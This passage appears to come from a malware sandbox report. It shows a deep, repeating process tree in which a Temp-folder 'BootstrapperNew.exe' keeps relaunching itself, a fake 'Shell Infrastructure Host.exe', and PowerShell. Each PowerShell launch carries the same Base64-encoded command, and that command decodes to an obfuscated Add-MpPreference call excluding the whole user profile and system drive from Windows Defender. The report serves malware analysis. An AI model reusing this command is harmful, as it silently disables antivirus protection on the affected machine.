        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        60⤵
        
        PID:6688
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        60⤵
        
        PID:6368
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        60⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        61⤵
        
        PID:6328
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        61⤵
        
        PID:6236
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        61⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        62⤵
        
        PID:6656
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        62⤵
        
        PID:5312
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        62⤵
        
        PID:5344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        63⤵
        
        PID:6400
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        63⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        63⤵
        
        PID:5968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        64⤵
        
        PID:4996
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        64⤵
        
        PID:3512
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        64⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        65⤵
        
        PID:6264
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        65⤵
        
        PID:6660
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        65⤵
        
        PID:6840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        66⤵
        
        PID:5944
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        66⤵
        
        PID:5156
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        66⤵
        
        PID:7076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        67⤵
        
        PID:4688
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        67⤵
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        67⤵
        
        PID:5888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        68⤵
        
        PID:6180
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        68⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        68⤵
        
        PID:1304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        69⤵
        
        PID:1796
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        69⤵
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        69⤵
        
        PID:5144
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        70⤵
        
        PID:4060
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        70⤵
        
        PID:6748
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        70⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        71⤵
        
        PID:220
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        71⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        71⤵
        
        PID:1336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        72⤵
        
        PID:1820
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        72⤵
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        72⤵
        
        PID:404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        73⤵
        
        PID:6932
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        73⤵
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        73⤵
        
        PID:6804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        74⤵
        
        PID:2692
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        74⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        74⤵
        
        PID:6360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        75⤵
        
        PID:4300
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        75⤵
        
        PID:3388
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        75⤵
        
        PID:4804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        76⤵
        
        PID:1876
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        76⤵
        
        PID:6224
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        76⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        77⤵
        
        PID:1076
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        77⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        77⤵
        
        PID:3064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        78⤵
        
        PID:3568
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        78⤵
        
        PID:5792
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        78⤵
        
        PID:6032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        79⤵
        
        PID:5216
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        79⤵
        
        PID:6536
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        79⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        80⤵
        
        PID:3152
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        80⤵
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        80⤵
        
        PID:5380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        81⤵
        
        PID:1836
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        81⤵
        
        PID:6772
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        81⤵
        
        PID:6136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        82⤵
        
        PID:5716
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        82⤵
        
        PID:5208
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        82⤵
        
        PID:6872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        83⤵
        
        PID:6052
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        83⤵
        
        PID:3504
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        83⤵
        
        PID:7140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        84⤵
        
        PID:5244
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        84⤵
        
        PID:5060
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        84⤵
        
        PID:1176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        85⤵
        
        PID:3544
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        85⤵
        
        PID:6036
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        85⤵
        
        PID:5612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        86⤵
        
        PID:5004
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        86⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        86⤵
        
        PID:1460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        87⤵
        
        PID:6172
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        87⤵
        
        PID:6176
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        87⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
